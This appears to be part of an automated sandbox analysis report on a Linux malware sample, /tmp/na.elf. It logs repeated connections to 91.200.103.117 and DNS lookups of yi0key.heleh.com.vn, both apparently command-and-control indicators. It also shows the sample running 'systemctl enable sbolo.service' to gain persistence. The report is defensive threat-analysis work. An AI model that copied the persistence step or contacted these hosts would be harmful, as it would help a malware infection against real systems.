                                      Oct 7, 2024 16:29:40.562309027 CEST235614166491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:40.562374115 CEST4166423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:40.562967062 CEST4166423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:40.567780972 CEST235614166491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:42.184689999 CEST235614166491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:42.184830904 CEST4166423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:42.190272093 CEST235614166491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:42.626739979 CEST5581053192.168.2.158.8.8.8
                                      Oct 7, 2024 16:29:42.631664038 CEST53558108.8.8.8192.168.2.15
                                      Oct 7, 2024 16:29:42.631728888 CEST5581053192.168.2.158.8.8.8
                                      Oct 7, 2024 16:29:42.631743908 CEST5581053192.168.2.158.8.8.8
                                      Oct 7, 2024 16:29:42.631763935 CEST5581053192.168.2.158.8.8.8
                                      Oct 7, 2024 16:29:42.636717081 CEST53558108.8.8.8192.168.2.15
                                      Oct 7, 2024 16:29:42.637048960 CEST53558108.8.8.8192.168.2.15
                                      Oct 7, 2024 16:29:43.057563066 CEST53558108.8.8.8192.168.2.15
                                      Oct 7, 2024 16:29:43.061269999 CEST5581053192.168.2.158.8.8.8
                                      Oct 7, 2024 16:29:43.182174921 CEST53558108.8.8.8192.168.2.15
                                      Oct 7, 2024 16:29:43.182720900 CEST5581053192.168.2.158.8.8.8
                                      Oct 7, 2024 16:29:45.058268070 CEST53558108.8.8.8192.168.2.15
                                      Oct 7, 2024 16:29:45.063107014 CEST5581053192.168.2.158.8.8.8
                                      Oct 7, 2024 16:29:45.068104982 CEST53558108.8.8.8192.168.2.15
                                      Oct 7, 2024 16:29:45.454617023 CEST4166823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:45.459537983 CEST235614166891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:45.462616920 CEST4166823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:45.542576075 CEST4166823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:45.547398090 CEST235614166891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:47.079379082 CEST235614166891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:47.079631090 CEST4166823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:47.084480047 CEST235614166891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:52.095820904 CEST4167023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:52.100642920 CEST235614167091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:52.100991964 CEST4167023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:52.101309061 CEST4167023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:52.106122017 CEST235614167091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:53.699300051 CEST235614167091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:53.699445963 CEST4167023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:53.704356909 CEST235614167091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:56.709172010 CEST4167223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:56.714447975 CEST235614167291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:56.714526892 CEST4167223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:56.715478897 CEST4167223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:56.720545053 CEST235614167291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:58.343408108 CEST235614167291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:29:58.343555927 CEST4167223561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:29:58.348421097 CEST235614167291.200.103.117192.168.2.15
                                      Oct 7, 2024 16:30:08.353007078 CEST4167423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:30:08.357933998 CEST235614167491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:30:08.357989073 CEST4167423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:30:08.358601093 CEST4167423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:30:08.363428116 CEST235614167491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:30:09.986047029 CEST235614167491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:30:09.986180067 CEST4167423561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:30:09.991636992 CEST235614167491.200.103.117192.168.2.15
                                      Oct 7, 2024 16:30:11.995325089 CEST4167623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:30:12.000299931 CEST235614167691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:30:12.000396967 CEST4167623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:30:12.001095057 CEST4167623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:30:12.005877972 CEST235614167691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:30:13.669790030 CEST235614167691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:30:13.670011997 CEST4167623561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:30:13.674913883 CEST235614167691.200.103.117192.168.2.15
                                      Oct 7, 2024 16:30:21.689384937 CEST4167823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:30:21.694715023 CEST235614167891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:30:21.694778919 CEST4167823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:30:21.695400953 CEST4167823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:30:21.700181007 CEST235614167891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:30:23.297605038 CEST235614167891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:30:23.297749996 CEST4167823561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:30:23.302687883 CEST235614167891.200.103.117192.168.2.15
                                      Oct 7, 2024 16:30:28.307990074 CEST4168023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:30:28.312947989 CEST235614168091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:30:28.313184023 CEST4168023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:30:28.314261913 CEST4168023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:30:28.319015026 CEST235614168091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:30:29.964735985 CEST235614168091.200.103.117192.168.2.15
                                      Oct 7, 2024 16:30:29.964880943 CEST4168023561192.168.2.1591.200.103.117
                                      Oct 7, 2024 16:30:29.969882011 CEST235614168091.200.103.117192.168.2.15
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 7, 2024 16:26:59.013564110 CEST5647153192.168.2.158.8.8.8
                                      Oct 7, 2024 16:26:59.675637960 CEST53564718.8.8.8192.168.2.15
                                      Oct 7, 2024 16:27:04.329395056 CEST6059253192.168.2.158.8.8.8
                                      Oct 7, 2024 16:27:04.337105036 CEST53605928.8.8.8192.168.2.15
                                      Oct 7, 2024 16:27:09.013325930 CEST4282353192.168.2.158.8.8.8
                                      Oct 7, 2024 16:27:09.020570040 CEST53428238.8.8.8192.168.2.15
                                      Oct 7, 2024 16:27:20.634593010 CEST5187653192.168.2.158.8.8.8
                                      Oct 7, 2024 16:27:20.641527891 CEST53518768.8.8.8192.168.2.15
                                      Oct 7, 2024 16:27:24.313563108 CEST3970353192.168.2.158.8.8.8
                                      Oct 7, 2024 16:27:24.329118967 CEST53397038.8.8.8192.168.2.15
                                      Oct 7, 2024 16:27:33.951715946 CEST5956553192.168.2.158.8.8.8
                                      Oct 7, 2024 16:27:33.958358049 CEST53595658.8.8.8192.168.2.15
                                      Oct 7, 2024 16:27:37.591448069 CEST3481553192.168.2.158.8.8.8
                                      Oct 7, 2024 16:27:37.598891973 CEST53348158.8.8.8192.168.2.15
                                      Oct 7, 2024 16:27:46.492557049 CEST4104953192.168.2.158.8.8.8
                                      Oct 7, 2024 16:27:46.499962091 CEST53410498.8.8.8192.168.2.15
                                      Oct 7, 2024 16:27:54.130675077 CEST5551953192.168.2.158.8.8.8
                                      Oct 7, 2024 16:27:54.138160944 CEST53555198.8.8.8192.168.2.15
                                      Oct 7, 2024 16:27:56.751756907 CEST5856653192.168.2.158.8.8.8
                                      Oct 7, 2024 16:27:56.758908033 CEST53585668.8.8.8192.168.2.15
                                      Oct 7, 2024 16:28:04.374725103 CEST3651253192.168.2.158.8.8.8
                                      Oct 7, 2024 16:28:04.381858110 CEST53365128.8.8.8192.168.2.15
                                      Oct 7, 2024 16:28:07.016633987 CEST3550653192.168.2.158.8.8.8
                                      Oct 7, 2024 16:28:07.023446083 CEST53355068.8.8.8192.168.2.15
                                      Oct 7, 2024 16:28:10.658463001 CEST3620953192.168.2.158.8.8.8
                                      Oct 7, 2024 16:28:10.812582970 CEST53362098.8.8.8192.168.2.15
                                      Oct 7, 2024 16:28:13.475169897 CEST4544253192.168.2.158.8.8.8
                                      Oct 7, 2024 16:28:13.482220888 CEST53454428.8.8.8192.168.2.15
                                      Oct 7, 2024 16:28:24.092350960 CEST5347153192.168.2.158.8.8.8
                                      Oct 7, 2024 16:28:24.107633114 CEST53534718.8.8.8192.168.2.15
                                      Oct 7, 2024 16:28:34.788705111 CEST3853553192.168.2.158.8.8.8
                                      Oct 7, 2024 16:28:34.797617912 CEST53385358.8.8.8192.168.2.15
                                      Oct 7, 2024 16:28:43.810432911 CEST4721953192.168.2.158.8.8.8
                                      Oct 7, 2024 16:28:43.818039894 CEST53472198.8.8.8192.168.2.15
                                      Oct 7, 2024 16:28:51.830888033 CEST5176653192.168.2.158.8.8.8
                                      Oct 7, 2024 16:28:51.838112116 CEST53517668.8.8.8192.168.2.15
                                      Oct 7, 2024 16:28:57.489679098 CEST5678753192.168.2.158.8.8.8
                                      Oct 7, 2024 16:28:57.499748945 CEST53567878.8.8.8192.168.2.15
                                      Oct 7, 2024 16:29:00.106976986 CEST5421553192.168.2.158.8.8.8
                                      Oct 7, 2024 16:29:00.117515087 CEST53542158.8.8.8192.168.2.15
                                      Oct 7, 2024 16:29:03.801065922 CEST5126653192.168.2.158.8.8.8
                                      Oct 7, 2024 16:29:03.812025070 CEST53512668.8.8.8192.168.2.15
                                      Oct 7, 2024 16:29:09.441320896 CEST4480553192.168.2.158.8.8.8
                                      Oct 7, 2024 16:29:09.449019909 CEST53448058.8.8.8192.168.2.15
                                      Oct 7, 2024 16:29:21.128983974 CEST5796053192.168.2.158.8.8.8
                                      Oct 7, 2024 16:29:21.258193970 CEST53579608.8.8.8192.168.2.15
                                      Oct 7, 2024 16:29:28.871577978 CEST4471653192.168.2.158.8.8.8
                                      Oct 7, 2024 16:29:28.878607988 CEST53447168.8.8.8192.168.2.15
                                      Oct 7, 2024 16:29:40.549242973 CEST3808353192.168.2.158.8.8.8
                                      Oct 7, 2024 16:29:40.556942940 CEST53380838.8.8.8192.168.2.15
                                      Oct 7, 2024 16:29:45.254586935 CEST5241553192.168.2.158.8.8.8
                                      Oct 7, 2024 16:29:45.440766096 CEST53524158.8.8.8192.168.2.15
                                      Oct 7, 2024 16:29:52.087658882 CEST6008153192.168.2.158.8.8.8
                                      Oct 7, 2024 16:29:52.095310926 CEST53600818.8.8.8192.168.2.15
                                      Oct 7, 2024 16:29:56.701343060 CEST4414953192.168.2.158.8.8.8
                                      Oct 7, 2024 16:29:56.708765030 CEST53441498.8.8.8192.168.2.15
                                      Oct 7, 2024 16:30:08.345376968 CEST5978353192.168.2.158.8.8.8
                                      Oct 7, 2024 16:30:08.352577925 CEST53597838.8.8.8192.168.2.15
                                      Oct 7, 2024 16:30:11.988225937 CEST5151853192.168.2.158.8.8.8
                                      Oct 7, 2024 16:30:11.994965076 CEST53515188.8.8.8192.168.2.15
                                      Oct 7, 2024 16:30:21.671679974 CEST3339853192.168.2.158.8.8.8
                                      Oct 7, 2024 16:30:21.688847065 CEST53333988.8.8.8192.168.2.15
                                      Oct 7, 2024 16:30:28.300410986 CEST3578853192.168.2.158.8.8.8
                                      Oct 7, 2024 16:30:28.307272911 CEST53357888.8.8.8192.168.2.15
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Oct 7, 2024 16:26:59.013564110 CEST192.168.2.158.8.8.80x42ccStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:04.329395056 CEST192.168.2.158.8.8.80x78d3Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:09.013325930 CEST192.168.2.158.8.8.80x4ea2Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:20.634593010 CEST192.168.2.158.8.8.80xe9dfStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:24.313563108 CEST192.168.2.158.8.8.80xbf1bStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:33.951715946 CEST192.168.2.158.8.8.80x1949Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:37.591448069 CEST192.168.2.158.8.8.80x882bStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:46.492557049 CEST192.168.2.158.8.8.80x9ad8Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:54.130675077 CEST192.168.2.158.8.8.80xf1c5Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:56.751756907 CEST192.168.2.158.8.8.80x534cStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:04.374725103 CEST192.168.2.158.8.8.80xf3a8Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:07.016633987 CEST192.168.2.158.8.8.80xc5a3Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:10.658463001 CEST192.168.2.158.8.8.80x61deStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:13.475169897 CEST192.168.2.158.8.8.80x7d3cStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:24.092350960 CEST192.168.2.158.8.8.80xf31fStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:34.788705111 CEST192.168.2.158.8.8.80x1164Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:43.810432911 CEST192.168.2.158.8.8.80xa8afStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:51.830888033 CEST192.168.2.158.8.8.80xf868Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:57.489679098 CEST192.168.2.158.8.8.80x865fStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:00.106976986 CEST192.168.2.158.8.8.80x9292Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:03.801065922 CEST192.168.2.158.8.8.80xcf5eStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:09.441320896 CEST192.168.2.158.8.8.80xaf92Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:21.128983974 CEST192.168.2.158.8.8.80x539bStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:28.871577978 CEST192.168.2.158.8.8.80xbf97Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:40.549242973 CEST192.168.2.158.8.8.80xf9c0Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:42.631743908 CEST192.168.2.158.8.8.80x23dfStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:42.631763935 CEST192.168.2.158.8.8.80x6a30Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                      Oct 7, 2024 16:29:45.254586935 CEST192.168.2.158.8.8.80xd836Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:52.087658882 CEST192.168.2.158.8.8.80x497aStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:56.701343060 CEST192.168.2.158.8.8.80x12daStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:30:08.345376968 CEST192.168.2.158.8.8.80x1e6eStandard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:30:11.988225937 CEST192.168.2.158.8.8.80x6ef0Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:30:21.671679974 CEST192.168.2.158.8.8.80x8f66Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:30:28.300410986 CEST192.168.2.158.8.8.80xc641Standard query (0)yi0key.heleh.com.vnA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Oct 7, 2024 16:26:59.675637960 CEST8.8.8.8192.168.2.150x42ccNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:04.337105036 CEST8.8.8.8192.168.2.150x78d3No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:09.020570040 CEST8.8.8.8192.168.2.150x4ea2No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:20.641527891 CEST8.8.8.8192.168.2.150xe9dfNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:24.329118967 CEST8.8.8.8192.168.2.150xbf1bNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:33.958358049 CEST8.8.8.8192.168.2.150x1949No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:37.598891973 CEST8.8.8.8192.168.2.150x882bNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:46.499962091 CEST8.8.8.8192.168.2.150x9ad8No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:54.138160944 CEST8.8.8.8192.168.2.150xf1c5No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:27:56.758908033 CEST8.8.8.8192.168.2.150x534cNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:04.381858110 CEST8.8.8.8192.168.2.150xf3a8No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:07.023446083 CEST8.8.8.8192.168.2.150xc5a3No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:10.812582970 CEST8.8.8.8192.168.2.150x61deNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:13.482220888 CEST8.8.8.8192.168.2.150x7d3cNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:24.107633114 CEST8.8.8.8192.168.2.150xf31fNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:34.797617912 CEST8.8.8.8192.168.2.150x1164No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:43.818039894 CEST8.8.8.8192.168.2.150xa8afNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:51.838112116 CEST8.8.8.8192.168.2.150xf868No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:28:57.499748945 CEST8.8.8.8192.168.2.150x865fNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:00.117515087 CEST8.8.8.8192.168.2.150x9292No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:03.812025070 CEST8.8.8.8192.168.2.150xcf5eNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:09.449019909 CEST8.8.8.8192.168.2.150xaf92No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:21.258193970 CEST8.8.8.8192.168.2.150x539bNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:28.878607988 CEST8.8.8.8192.168.2.150xbf97No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:40.556942940 CEST8.8.8.8192.168.2.150xf9c0No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:43.182174921 CEST8.8.8.8192.168.2.150x23dfNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:43.182174921 CEST8.8.8.8192.168.2.150x23dfNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:45.440766096 CEST8.8.8.8192.168.2.150xd836No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:52.095310926 CEST8.8.8.8192.168.2.150x497aNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:29:56.708765030 CEST8.8.8.8192.168.2.150x12daNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:30:08.352577925 CEST8.8.8.8192.168.2.150x1e6eNo error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:30:11.994965076 CEST8.8.8.8192.168.2.150x6ef0No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:30:21.688847065 CEST8.8.8.8192.168.2.150x8f66No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false
                                      Oct 7, 2024 16:30:28.307272911 CEST8.8.8.8192.168.2.150xc641No error (0)yi0key.heleh.com.vn91.200.103.117A (IP address)IN (0x0001)false

                                      System Behavior

                                      Start time (UTC):14:26:57
                                      Start date (UTC):07/10/2024
                                      Path:/tmp/na.elf
                                      Arguments:/tmp/na.elf
                                      File size:4956856 bytes
                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                      Start time (UTC):14:26:57
                                      Start date (UTC):07/10/2024
                                      Path:/tmp/na.elf
                                      Arguments:-
                                      File size:4956856 bytes
                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                      Start time (UTC):14:26:57
                                      Start date (UTC):07/10/2024
                                      Path:/tmp/na.elf
                                      Arguments:-
                                      File size:4956856 bytes
                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                      Start time (UTC):14:26:57
                                      Start date (UTC):07/10/2024
                                      Path:/bin/sh
                                      Arguments:sh -c "systemctl enable sbolo.service > /dev/null 2>&1"
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):14:26:57
                                      Start date (UTC):07/10/2024
                                      Path:/bin/sh
                                      Arguments:-
                                      File size:129816 bytes
                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                      Start time (UTC):14:26:57
                                      Start date (UTC):07/10/2024
                                      Path:/usr/bin/systemctl
                                      Arguments:systemctl enable sbolo.service
                                      File size:996584 bytes
                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                      Start time (UTC):14:26:57
                                      Start date (UTC):07/10/2024
                                      Path:/tmp/na.elf
                                      Arguments:-
                                      File size:4956856 bytes
                                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                      Start time (UTC):14:26:57
                                      Start date (UTC):07/10/2024
                                      Path:/usr/lib/systemd/systemd
                                      Arguments:-
                                      File size:1620224 bytes
                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                      Start time (UTC):14:26:57
                                      Start date (UTC):07/10/2024
                                      Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                      Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                      File size:22760 bytes
                                      MD5 hash:3633b075f40283ec938a2a6a89671b0e